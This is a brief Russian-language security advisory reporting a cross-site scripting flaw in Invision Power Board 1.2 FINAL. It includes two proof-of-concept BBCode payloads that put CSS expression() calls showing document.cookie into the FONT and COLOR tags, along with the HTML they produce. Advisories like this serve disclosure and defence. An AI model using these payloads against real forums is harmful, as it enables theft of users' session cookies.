Программа: Invision Power Board 1.2 FINAL
Уязвимость обнаружена в Invision Power Board. Удаленный атакующий может выполнить XSS нападение против пользователей форума.
Удаленный атакующий может внедрить произвольный код сценария в COLOR и FONT тэги.
Пример/Эксплоит:
[FONT=expression( alert(document.cookie))] text[/FONT] will made the HTML : <span
style='font-family:expression( alert(document.cookie))'>text</span>
[COLOR=expression( alert(document.cookie))] texte[/COLOR] will made the HTML : <span
style='color:expression( alert(document.cookie))'>text</span>
